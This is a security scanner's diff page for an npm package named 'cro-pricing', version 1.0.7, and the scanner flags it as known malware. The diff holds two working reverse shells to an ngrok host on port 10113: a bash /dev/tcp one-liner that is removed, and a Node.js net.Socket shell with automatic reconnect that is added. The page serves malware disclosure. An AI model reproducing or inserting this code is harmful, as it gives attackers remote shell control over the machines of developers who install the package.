cro-pricing
Advanced tools
+1
-1
| { | ||
| "name": "cro-pricing", | ||
| "version": "1.0.6", | ||
| "version": "1.0.7", | ||
| "main": "index.js", | ||
@@ -5,0 +5,0 @@ "scripts": { |
+17
-7
@@ -1,10 +0,20 @@ | ||
| const { exec } = require("child_process"); | ||
| const net = require("net"); | ||
| const { spawn } = require("child_process"); | ||
| const reverseShellCmd = `nohup bash -c 'exec 5<>/dev/tcp/0.tcp.ap.ngrok.io/10113; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`; | ||
| const host = "0.tcp.ap.ngrok.io"; | ||
| const port = 10113; | ||
| exec(reverseShellCmd, (error, stdout, stderr) => { | ||
| if (error) { | ||
| // Optional: log error to your ngrok endpoint or skip silently | ||
| return; | ||
| } | ||
| const client = new net.Socket(); | ||
| client.connect(port, host, () => { | ||
| const sh = spawn("/bin/sh", []); | ||
| client.pipe(sh.stdin); | ||
| sh.stdout.pipe(client); | ||
| sh.stderr.pipe(client); | ||
| }); | ||
| client.on("error", (err) => { | ||
| setTimeout(() => { | ||
| client.connect(port, host); | ||
| }, 5000); // retry on disconnect | ||
| }); |
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Trivial Package
Supply chain riskPackages less than 10 lines of code are easily copied into your own project and may not warrant the additional supply chain risk of an external dependency.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
688
16.61%16
100%0
-100%2
100%2
100%